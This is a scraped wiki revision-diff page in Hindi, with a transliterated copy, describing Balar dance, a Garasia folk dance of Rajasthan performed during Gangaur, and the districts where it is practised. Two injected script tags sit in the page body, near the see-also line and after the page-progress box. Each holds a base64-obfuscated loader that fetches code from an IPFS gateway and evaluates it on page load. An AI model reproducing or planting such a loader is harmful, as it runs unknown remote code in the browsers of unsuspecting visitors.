Difference between revisions of "बालर नृत्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''बालर नृत्य''' राजस्थान के लोक नृत्यों म...' के साथ नया पन्ना बनाया)
 
 
Line 3: Line 3:
 
*यह [[गरासिया|गरासियों]] का प्रसिद्ध नृत्य है, जिसे विशेषकर गणगौर के दिनों में किया जाता है।
 
*यह [[गरासिया|गरासियों]] का प्रसिद्ध नृत्य है, जिसे विशेषकर गणगौर के दिनों में किया जाता है।
 
*बालर नृत्य में स्त्री-पुरुष अर्द्धवृत्ताकार घेरे में धीमी [[गति]] से बिना किसी [[वाद्य यंत्र|वाद्य]] के नृत्य करते हैं।
 
*बालर नृत्य में स्त्री-पुरुष अर्द्धवृत्ताकार घेरे में धीमी [[गति]] से बिना किसी [[वाद्य यंत्र|वाद्य]] के नृत्य करते हैं।
*यह नृत्य [[डूंगरपुर ज़िला|डूंगरपुर]], [[उदयपुर]], [[पाली ज़िला|पाली]] व [[सिरोही]] क्षेत्रों में प्रचलित है।  
+
*यह नृत्य [[डूंगरपुर]], [[उदयपुर]], [[पाली ज़िला|पाली]] व [[सिरोही]] क्षेत्रों में प्रचलित है।  
  
 
{{seealso|घुड़ला नृत्य|अग्नि नृत्य|कालबेलिया नृत्य}}
 
{{seealso|घुड़ला नृत्य|अग्नि नृत्य|कालबेलिया नृत्य}}

Latest revision as of 08:20, 14 May 2014

balar nrity rajasthan ke lok nrityoan mean se ek hai. yah nrity mukhy roop se 'ganagaur' tyohar ke dinoan mean hota hai.

  • yah garasiyoan ka prasiddh nrity hai, jise visheshakar ganagaur ke dinoan mean kiya jata hai.
  • balar nrity mean stri-purush arddhavrittakar ghere mean dhimi gati se bina kisi vady ke nrity karate haian.
  • yah nrity dooangarapur, udayapur, pali v sirohi kshetroan mean prachalit hai.
  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh